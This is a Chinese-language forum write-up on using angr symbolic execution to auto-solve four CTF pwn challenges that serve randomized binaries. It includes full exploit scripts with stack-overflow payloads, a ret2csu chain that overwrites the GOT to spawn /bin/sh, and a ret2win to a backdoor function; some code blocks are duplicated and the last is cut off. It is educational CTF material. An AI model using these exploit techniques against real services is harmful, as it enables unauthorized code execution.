首页
社区
课程
招聘
[原创]angr在ctf pwn中的使用
发表于: 2023-9-23 00:28 12444

[原创]angr在ctf pwn中的使用

2023-9-23 00:28
12444

这类利用angr去自动探测漏洞的题在很早以前就看到过,但是在CTF中不会直接给附件,而是nc连上后接收一段base64编码,再将其解码为二进制文件,每次得到的二进制文件并不是完全相同;如果不给出完整的docker文件(拥有几个接收到二进制文件也行),不然本地是很难复现的。

这里找的是三个拥有完整docker文件的题和一个可以提供两个二进制文件的题:

https://github.com/huaweictf/xctf_huaweicloud-qualifier-2020/tree/main/pwn/game_pwn

https://github.com/P4nda0s/CheckIn_ret2text

https://github.com/utisss/UTCTF-22/tree/33b6bae1338ddabc6c795387051a544cee8e1a16/pwn/pwn-aeg2

https://github.com/cscosu/ctf-writeups/tree/8d7885461c734a3035cacc7e739c90c1bc7910a3/2021/utctf/AEG

题目一开始就直接发送base64编码,然后让我们输入一段数据,这里还不知道这串数据是什么,并且一段时间后就会关闭:

解码得到二进制文件后直接使用ida分析,主函数中将程序接收到的第一个参数转化为整数后作为sub_4006F9函数的的参数:

sub_4006F9函数中利用这个参数去通过一系列判断,如果满足这些约束就可以执行read函数去栈溢出:

继续接收多个文件,发现每个文件中sub_4006F9函数中的约束条件都是不同的;我们每次去分析这些约束肯定会浪费大量时间,在题目拥有时间限制的情况下完全不合适,这里就要用到angr去自动判断约束条件。

angr的用法可以直接参考这些文档:https://docs.angr.io/en/latest/https://xz.aliyun.com/t/7117

最好先去拿angr ctf先去练手,加深理解:https://github.com/jakespringer/angr_ctfhttps://arttnba3.cn/2022/11/24/ANGR-0X00-ANGR_CTF/

需要判断约束的只有sub_4006F9函数,直接将其作为初始状态,而目标地址在read函数处,将rdi作为需要求解对象,很容易写出自动求解的脚本:

在不同的二进制文件中,除了start_addr相同,目标地址是不同的,并且没有符号表,只能通过特定的汇编机器码找到对应的地址。官方的wp是使用objdump命令去找,这里我直接使用pwntools去搜索,更加方便。

得到通过约束条件的整数后,可以知道最开始的输入就是这个整数,然后继续输入栈溢出;栈溢出后去ret2csu继续调用read函数去修改read函数got表的最后一字节,修改为指向syscall指令的地址,再调用atoi将rax赋值为0x3b,最后调用read函数,这时read函数got指向syscall指令,可以执行系统调用去getshell。

完整exp:

这题连上后需要爆破前四位数据与sha256加密后的数据对比,通过这个判断后可以得到二进制文件base64编码:

题目的主函数就是一堆判断,input_val函数是输入的数字,input_line函数是输入的字符串,fksth函数是比较字符串,题目给了后门函数,没有canary,很容易想到栈溢出后去调用backdoor函数:

造成溢出的输入函数肯定是input_line,第一个参数是写入地址,第二个参数是大小;主函数中有大量的input_line函数调用,而且第二个参数普遍不大,开始就直接找到靠近栈底的变量,找到其引用的input_line:

最后果然可以找到栈溢出:


不同的二进制文件中fksth函数比较的字符串是不同的,判断的数字也是不同的,这里依然是使用angr去求解约束。

出题人的wp已经很详细了,直接使用unconstrained state求解就得到一个完整的payload。自己复现时将proj.factory.entry_state()修改为指定main函数的地址,但是却得不到正确的payload,不知道是不是unconstrained state求解的影响。

最后自己也采用传统的方法——直接找到可以发生栈溢出的地址,改写了一下。

完整exp:

题目存在格式化字符串,而得到flag的方式是控制exit的参数为指定值。输入字符串后通过permute函数加密,再由printf去执行:

跟据前面做题的经验很快就可以写出如下通过约束的代码:

但是这样直接去得到加密的字符串要花费将近两分钟,而这题限时60秒,这种方法是完全行不通的。

看完官方的wp才发现,permute中的这些加密函数并不是真正的加密,它们只是将初始字符的位置进行交换:

这里简述一下官方wp的思路:

其实我们只用关心初始字符串的顺序和最终字符串的顺序,字符串在permute1、permute2、permute3……这些函数中的变化是完全不用考虑的,最后改写代码如下:

这个直接几秒钟就可以得到最终的字符顺序表。

完整exp:

获得flag:

这道题网上只找到的两个二进制文件,没有完整的题目环境。

题目也很简单,栈溢出后控制到win函数执行exit函数,和上面题目方法一样。

通过约束的exp如下:

这里整理的四道题希望对各位师傅有帮助。

import angr
import claripy
binary_name = "a"
proj = angr.Project(binary_name)
start_addr = 0x4006F9
init_state = proj.factory.blank_state(addr = start_addr)
num_bvs = claripy.BVS('num', 4 * 8)
init_state.regs.rdi = num_bvs
simgr = proj.factory.simgr(init_state)
simgr.explore(find = find_addr)
if simgr.found:
    solution_state = simgr.found[0]
    num = solution_state.solver.eval(num_bvs, cast_to=int)
else :
    print('Could not find the solution')
import angr
import claripy
binary_name = "a"
proj = angr.Project(binary_name)
start_addr = 0x4006F9
init_state = proj.factory.blank_state(addr = start_addr)
num_bvs = claripy.BVS('num', 4 * 8)
init_state.regs.rdi = num_bvs
simgr = proj.factory.simgr(init_state)
simgr.explore(find = find_addr)
if simgr.found:
    solution_state = simgr.found[0]
    num = solution_state.solver.eval(num_bvs, cast_to=int)
else :
    print('Could not find the solution')
import angr
import claripy
from pwn import*
import base64
 
p = remote('127.0.0.1', 9999)
p.recvline()
p.recvline()
bin_data = base64.b64decode(p.recvline().decode())
open("b", "wb").write(bin_data)
binary_name = "b"
#使用pwntools搜索指令得到相应的地址
elf = ELF(binary_name, checksec=False)
context.arch = 'amd64'
#context.log_level = 'debug'
find_addr = elf.search(asm('mov rsi, rax')).__next__() + 3
avoid_addr = find_addr + 0x1b
avoid_addr1 = find_addr + 0x11
csu_addr1 = elf.search(asm('add rsp, 8;pop rbx')).__next__() + 4
csu_addr2 = csu_addr1 - 0x1a
pop_rdi_ret = csu_addr1 + 9
pop_rsi_r15_ret = csu_addr1 + 7
 
#使用angr得到通过约束的整数
proj = angr.Project(binary_name)
start_addr = 0x4006F9
init_state = proj.factory.blank_state(addr = start_addr)
num_bvs = claripy.BVS('num', 4 * 8)
init_state.regs.rdi = num_bvs
# def fail(state):
#     if state.addr <= avoid_addr and state.addr >= avoid_addr1:
#         return True
#     else:
#         return False
num = 0
oversize = 0
simgr = proj.factory.simgr(init_state)
simgr.explore(find = find_addr, avoid = avoid_addr)
if simgr.found:
    solution_state = simgr.found[0]
    num = solution_state.solver.eval(num_bvs, cast_to=int)
    oversize = solution_state.solver.eval(solution_state.regs.rbp) - solution_state.solver.eval(solution_state.regs.rsi) #不同二进制文件的溢出大小不同,这里计算得到溢出大小
else :
    print('Could not find the solution')
    exit()
 
p.sendlineafter(b':', str(num).encode())
#栈溢出getshell
# start_process = './' + binary_name + ' ' + str(num)
# p = process(start_process.split())
# gdb.attach(p, "b *" + str(find_addr + 10))
# pause()
payload = b'a' * oversize + p64(0) + p64(csu_addr1)
payload += p64(0) + p64(1) + p64(elf.got['read']) + p64(0x11) + p64(0x601010) + p64(0) + p64(csu_addr2)
payload += p64(0) + p64(0) + p64(1) + p64(elf.got['atoi']) + p64(0) + p64(0) + p64(0x601010) + p64(csu_addr2)
payload += p64(0) + p64(0) + p64(1) + p64(elf.got['read']) + p64(0) + p64(0) + p64(0x601018) + p64(csu_addr2)
p.send(payload)
sleep(0.5)
payload = b'59' + b'\x00' * 6 + b'/bin/sh\x00' + b'\x5e'
p.send(payload)
p.sendline(b"cat flag")
flag = p.recvline()
print(flag)
#p.interactive()
import angr
import claripy
from pwn import*
import base64
 
p = remote('127.0.0.1', 9999)
p.recvline()
p.recvline()
bin_data = base64.b64decode(p.recvline().decode())
open("b", "wb").write(bin_data)
binary_name = "b"
#使用pwntools搜索指令得到相应的地址
elf = ELF(binary_name, checksec=False)
context.arch = 'amd64'
#context.log_level = 'debug'
find_addr = elf.search(asm('mov rsi, rax')).__next__() + 3
avoid_addr = find_addr + 0x1b
avoid_addr1 = find_addr + 0x11
csu_addr1 = elf.search(asm('add rsp, 8;pop rbx')).__next__() + 4
csu_addr2 = csu_addr1 - 0x1a
pop_rdi_ret = csu_addr1 + 9
pop_rsi_r15_ret = csu_addr1 + 7
 
#使用angr得到通过约束的整数
proj = angr.Project(binary_name)
start_addr = 0x4006F9
init_state = proj.factory.blank_state(addr = start_addr)
num_bvs = claripy.BVS('num', 4 * 8)
init_state.regs.rdi = num_bvs
# def fail(state):
#     if state.addr <= avoid_addr and state.addr >= avoid_addr1:
#         return True
#     else:
#         return False
num = 0
oversize = 0
simgr = proj.factory.simgr(init_state)
simgr.explore(find = find_addr, avoid = avoid_addr)
if simgr.found:
    solution_state = simgr.found[0]
    num = solution_state.solver.eval(num_bvs, cast_to=int)
    oversize = solution_state.solver.eval(solution_state.regs.rbp) - solution_state.solver.eval(solution_state.regs.rsi) #不同二进制文件的溢出大小不同,这里计算得到溢出大小
else :
    print('Could not find the solution')
    exit()
 
p.sendlineafter(b':', str(num).encode())
#栈溢出getshell
# start_process = './' + binary_name + ' ' + str(num)
# p = process(start_process.split())
# gdb.attach(p, "b *" + str(find_addr + 10))
# pause()
payload = b'a' * oversize + p64(0) + p64(csu_addr1)
payload += p64(0) + p64(1) + p64(elf.got['read']) + p64(0x11) + p64(0x601010) + p64(0) + p64(csu_addr2)
payload += p64(0) + p64(0) + p64(1) + p64(elf.got['atoi']) + p64(0) + p64(0) + p64(0x601010) + p64(csu_addr2)
payload += p64(0) + p64(0) + p64(1) + p64(elf.got['read']) + p64(0) + p64(0) + p64(0x601018) + p64(csu_addr2)
p.send(payload)
sleep(0.5)
payload = b'59' + b'\x00' * 6 + b'/bin/sh\x00' + b'\x5e'
p.send(payload)
p.sendline(b"cat flag")
flag = p.recvline()
print(flag)
#p.interactive()
from pwn import *
import base64
import hashlib
import random
import angr
import claripy
 
def pass_proof(salt, hash):
    dir = string.ascii_letters + string.digits
    while True:
        rand_str = (''.join([random.choice(dir) for _ in range(4)])).encode() + salt
        if hashlib.sha256(rand_str).hexdigest() == hash.decode() :
            return rand_str[:4]
 
p = remote('127.0.0.1', 9999)
p.recvuntil(b'sha256(xxxx + ')
salt = p.recvuntil(b')')[:-1]
p.recvuntil(b' == ')
hash = p.recvuntil(b'\n')[:-2]
t = pass_proof(salt, hash)
p.sendlineafter(b"give me xxxx:", t)
p.recvline()
bin_data = base64.b64decode(p.recvline().decode())
open("a", "wb").write(bin_data)
 
def load_str(state, addr):
    s, i = '', 0
    while True:
        ch = state.solver.eval(state.memory.load(addr + i, 1))
        if ch == 0:
            break
        s += chr(ch)
        i += 1
    return s
 
def save_global_val(state, bvs, type):
    name = "s_" + str(state.globals['count'])
    state.globals['count'] += 1
    state.globals[name] = (bvs, type)
 
class replace_init(angr.SimProcedure):
        def run(self):
            return
 
class replace_input_line(angr.SimProcedure):
        def run(self, buf_addr, size):
            size = self.state.solver.eval(size)
            buf_bvs = claripy.BVS("buf", size * 8)
            save_global_val(self.state, buf_bvs, "str")
            self.state.memory.store(buf_addr, buf_bvs)
 
class replace_input_val(angr.SimProcedure):
        def run(self):
            num_bvs = claripy.BVS("num", 4 * 8)
            save_global_val(self.state, num_bvs, "int")
            self.state.regs.rax = num_bvs
 
class replace_fksth(angr.SimProcedure):
        def run(self, str1_addr, str2_addr):
            str2 = load_str(self.state, str2_addr).encode()
            str1 = self.state.memory.load(str1_addr, len(str2))
            self.state.regs.rax = claripy.If(str1 == str2, claripy.BVV(0, 32), claripy.BVV(1, 32))
 
binary_name = "a"
proj = angr.Project(binary_name)
proj.hook_symbol("_Z4initv", replace_init())
proj.hook_symbol("_Z10input_linePcm", replace_input_line())
proj.hook_symbol("_Z9input_valv", replace_input_val())
proj.hook_symbol("_Z5fksthPKcS0_", replace_fksth())
symbol = proj.loader.find_symbol("main")
start_addr = symbol.rebased_addr
init_state = proj.factory.blank_state(addr = start_addr)
init_state.globals['count'] = 0
 
find_addr = proj.loader.find_symbol('_Z10input_linePcm').rebased_addr
 
#判断在input_line中是否发生溢出
def success(state):
    if state.addr == find_addr:
        reg_rbp = state.regs.rbp
        reg_rdi = state.regs.rdi
        reg_rsi = state.regs.rsi
        add_addr = reg_rdi + reg_rsi
        copied_state = state.copy()
        copied_state.add_constraints(reg_rbp < add_addr)
        if copied_state.satisfiable():
            state.add_constraints(reg_rbp < add_addr)
            state.globals['overflow'] = (state.solver.eval(reg_rbp) - state.solver.eval(reg_rdi), state.solver.eval(reg_rsi))  #保存溢出大小和输入大小
            return True
    else:
        return False
 
simgr = proj.factory.simgr(init_state)
 
simgr.explore(find=success)
if simgr.found:
    print("find")
    bindata = b''
    solution_state = simgr.found[0]
    for i in range(solution_state.globals['count']):
        s, s_type = solution_state.globals['s_' + str(i)]
        if s_type == 'str':
            bb = solution_state.solver.eval(s, cast_to=bytes)
            bindata += bb
        elif s_type == 'int':
            bindata += str(solution_state.solver.eval(s, cast_to=int)).encode() + b' '
 
    elf = ELF(binary_name, checksec=False)
    context.arch = 'amd64'
    ret = elf.search(asm('ret')).__next__()
    m, n = solution_state.globals['overflow']
    payload = b'a' * m + p64(0) + p64(ret) + p64(elf.sym['_Z8backdoorv'])
    bindata += payload.ljust(n, b'\x00')
    p.send(bindata)
    p.interactive()
else:
    print('Could not find the solution')
from pwn import *
import base64
import hashlib
import random
import angr
import claripy
 
def pass_proof(salt, hash):
    dir = string.ascii_letters + string.digits
    while True:
        rand_str = (''.join([random.choice(dir) for _ in range(4)])).encode() + salt
        if hashlib.sha256(rand_str).hexdigest() == hash.decode() :
            return rand_str[:4]
 
p = remote('127.0.0.1', 9999)
p.recvuntil(b'sha256(xxxx + ')
salt = p.recvuntil(b')')[:-1]
p.recvuntil(b' == ')
hash = p.recvuntil(b'\n')[:-2]
t = pass_proof(salt, hash)
p.sendlineafter(b"give me xxxx:", t)
p.recvline()
bin_data = base64.b64decode(p.recvline().decode())
open("a", "wb").write(bin_data)
 
def load_str(state, addr):
    s, i = '', 0
    while True:
        ch = state.solver.eval(state.memory.load(addr + i, 1))
        if ch == 0:
            break
        s += chr(ch)
        i += 1
    return s
 
def save_global_val(state, bvs, type):
    name = "s_" + str(state.globals['count'])
    state.globals['count'] += 1
    state.globals[name] = (bvs, type)
 
class replace_init(angr.SimProcedure):
        def run(self):
            return
 
class replace_input_line(angr.SimProcedure):
        def run(self, buf_addr, size):
            size = self.state.solver.eval(size)
            buf_bvs = claripy.BVS("buf", size * 8)
            save_global_val(self.state, buf_bvs, "str")
            self.state.memory.store(buf_addr, buf_bvs)
 
class replace_input_val(angr.SimProcedure):
        def run(self):
            num_bvs = claripy.BVS("num", 4 * 8)
            save_global_val(self.state, num_bvs, "int")
            self.state.regs.rax = num_bvs
 
class replace_fksth(angr.SimProcedure):
        def run(self, str1_addr, str2_addr):
            str2 = load_str(self.state, str2_addr).encode()
            str1 = self.state.memory.load(str1_addr, len(str2))
            self.state.regs.rax = claripy.If(str1 == str2, claripy.BVV(0, 32), claripy.BVV(1, 32))
 
binary_name = "a"
proj = angr.Project(binary_name)
proj.hook_symbol("_Z4initv", replace_init())
proj.hook_symbol("_Z10input_linePcm", replace_input_line())
proj.hook_symbol("_Z9input_valv", replace_input_val())
proj.hook_symbol("_Z5fksthPKcS0_", replace_fksth())
symbol = proj.loader.find_symbol("main")
start_addr = symbol.rebased_addr
init_state = proj.factory.blank_state(addr = start_addr)
init_state.globals['count'] = 0
 
find_addr = proj.loader.find_symbol('_Z10input_linePcm').rebased_addr
 
#判断在input_line中是否发生溢出
def success(state):
    if state.addr == find_addr:

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

最后于 2023-9-23 00:50 被theshadow编辑 ,原因:
收藏
免费 3
支持
分享
最新回复 (2)
雪    币: 3059
活跃值: (30876)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
感谢分享
2023-9-23 23:11
1
雪    币: 6942
活跃值: (2775)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
感谢分析,很不错的文章,里面例题的题型也很棒
2023-9-24 15:13
0
游客
登录 | 注册 方可回帖
返回
//